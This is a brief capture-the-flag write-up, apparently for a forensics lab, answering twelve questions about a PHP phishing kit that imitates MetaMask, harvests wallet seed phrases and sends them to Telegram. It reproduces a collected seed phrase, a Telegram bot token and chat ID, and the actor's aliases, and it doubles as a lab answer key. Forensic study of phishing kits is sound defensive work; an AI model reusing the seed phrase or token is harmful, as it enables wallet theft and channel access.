GrabThePhisher WriteUp
1-) Which wallet is used for asking the seed phrase?
Investigate index , detect metamask folder
go to metamask directory and open the metamask.php
Bingoo = found wallet name
Answer => Metamask
2-)What is the file name that has the code for the phishing kit?
Answer => metamask.php
3-) In which language was the kit written?
Answer => php
4-) What service does the kit use to retrieve the victim’s machine information?
Answer => Sypex Geo
5-) How many seed phrases were already collected?
geo — city — date
Answer => 3
6-) How many seed phrases were already collected?
Answer => father also recycle embody balance concert mechanic believe owner pair muffin hockey
7-) Which medium had been used for credential dumping?
Answer => telegram
8-) What is the token for the channel?
open metamask.php
Answer => 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9-) What is the chat ID of the phisher’s channel?
open metamask.php
Answer => 5442785564
10-) What are the allies of the phish kit developer?
open metamask.php
Answer => j1j1b1s@m3r0
11-) What is the full name of the Phish Actor?
requests telegram channel
Answer => Marcus Aurelius
12-) What is the username of the Phish Actor?
requests telegram channel
Answer => pumpkinboii